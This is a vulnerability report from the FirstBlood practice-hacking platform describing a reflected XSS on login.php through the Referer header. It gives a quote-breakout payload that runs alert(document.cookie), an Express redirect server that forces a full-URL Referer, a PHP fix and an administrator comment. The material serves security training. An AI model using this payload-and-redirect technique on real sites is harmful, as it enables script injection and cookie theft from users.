FirstBlood-#583 Reflective XSS via Referer on login.php endpoint
This issue was discovered on FirstBlood v2



On 2021-10-26, panya Level 7 reported:

The site is vulnerable to Reflective XSS on the /login.php endpoint. It reflects the Referer header value inside the "Return to previous page" link's href (in single quotes).

Steps to reproduce:

  1. Open this URL: http://ztn.me/test'onclick=alert(document.cookie);return(false)//

It is hosted on my server:

const express = require('express');

const app = express();

app.get('*', (req, res) => {
  // Tell the browser to send the full URL (including the payload) as the Referer
  res.set('Referrer-Policy', 'unsafe-url');
  res.set('Content-Type', 'text/html');
  // Redirect every request to the target login page
  res.end('<script>location.replace("https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php");</script>');
});

app.listen(80);

  2. The browser will redirect you to https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php
  3. Click on the "Return to previous page" link.

Actual result:

There will be an alert with the user's document.cookie value (doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9 in our case).

Expected result:

The Referer header's value should be properly escaped or sanitized. The alert should not be shown.

Impact:

An attacker could execute JS code on behalf of a user of this site.

P3 Medium

Endpoint: /login.php

Parameter: Referer

Payload: http://ztn.me/test'onclick=alert(document.cookie);return(false)//


FirstBlood ID: 19
Vulnerability Type: Reflective XSS

The ?ref= parameter on login.php was fixed, and $_SERVER['HTTP_REFERER'] was used instead. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments, for example!) and the Referer header is vulnerable to reflective XSS.
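As an added example (not FirstBlood's own login.php code), the single-quoted href reflection described in this report beside a hardened version that validates the URL and encodes it for the attribute context; the function names and the fallback path are assumptions:

```php
<?php
// Added example, not FirstBlood's login.php. Function names are assumptions.

// VULNERABLE: the Referer header is dropped raw into a single-quoted href, so a
// value containing ' closes the attribute and whatever follows (e.g. onclick=)
// is parsed as a new attribute.
function vulnerable_return_link(string $referer): string
{
    return "<a href='" . $referer . "'>Return to previous page</a>";
}

// HARDENED: (1) only accept absolute http(s) URLs, otherwise fall back to a
// fixed in-app page (also covers the case where no Referer was sent at all);
// (2) encode for the HTML attribute context with ENT_QUOTES so both ' and "
// become entities and can no longer terminate the attribute.
function safe_return_link(?string $referer, string $fallback = '/index.php'): string
{
    $target = $fallback;
    if ($referer !== null) {
        $parts = parse_url($referer);
        if ($parts !== false
            && isset($parts['scheme'], $parts['host'])
            && in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
            $target = $referer;
        }
    }
    $encoded = htmlspecialchars($target, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<a href='" . $encoded . "'>Return to previous page</a>";
}

// Constructed input: the payload from the report, as it would arrive in
// $_SERVER['HTTP_REFERER'] when the browser is told to send the full URL.
$payload = "http://ztn.me/test'onclick=alert(document.cookie);return(false)//";

// Raw reflection: the quote breaks out of href and onclick= becomes an attribute.
echo vulnerable_return_link($payload), PHP_EOL;

// Hardened: the URL is still a valid http URL, but the quote is now an entity
// inside the attribute value, so no new attribute is created.
echo safe_return_link($payload), PHP_EOL;

// A non-http scheme or a missing header both land on the fallback page.
echo safe_return_link('javascript:alert(1)'), PHP_EOL;
echo safe_return_link($_SERVER['HTTP_REFERER'] ?? null), PHP_EOL;
```

Attribute encoding stops the break-out shown in the report; the scheme check is an extra guard so that a Referer cannot turn the link into a javascript: URL even though that is not the vector reported here.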

Report Feedback

@zseano

Creator & Administrator


Nice panya! Fun fact: even though the referrer is vulnerable, on a lot of the reports for this the payload provided simply wouldn't work (use of < > etc.). So kudos for providing a working PoC. Actually, for me when testing it would only work on IE, as it seems for me on the latest version of Chrome/FF the ' character is now filtered. I'll play some more though and may update this bug description.